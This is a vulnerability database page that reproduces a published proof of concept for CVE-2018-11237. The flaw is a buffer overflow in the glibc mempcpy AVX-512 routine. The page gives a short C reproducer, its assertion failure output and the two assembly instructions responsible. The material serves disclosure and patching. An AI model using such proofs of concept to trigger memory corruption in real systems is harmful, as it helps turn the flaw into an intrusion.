Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-11237

Publish Date: 24 May 2018

Source

                							

                # Exploit Title: GNU glibc &lt; 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com &lt;http://jameelnabbo.com/&gt;
# Vendor Homepage: http://www.gnu.org/ &lt;http://www.gnu.org/&gt;
# CVE: CVE-2018-11237
 
 
# POC:
 
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include &lt;string.h&gt;
#include &lt;assert.h&gt;
 
#define N 97699
char a[N];
char b[N+128];
 
int
main (void)
{
  memset (a, 'x', N);
  char *c = mempcpy (b, a, N);
  assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy 
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
 
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
 
    vmovups %zmm4, (%rax)
    vmovups %zmm5, 0x40(%rax)
 
For mempcpy, %rax points to the end of the buffer.

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

GNU glibc Local Buffer Overflow

Vulmon Search

About

Products

Connect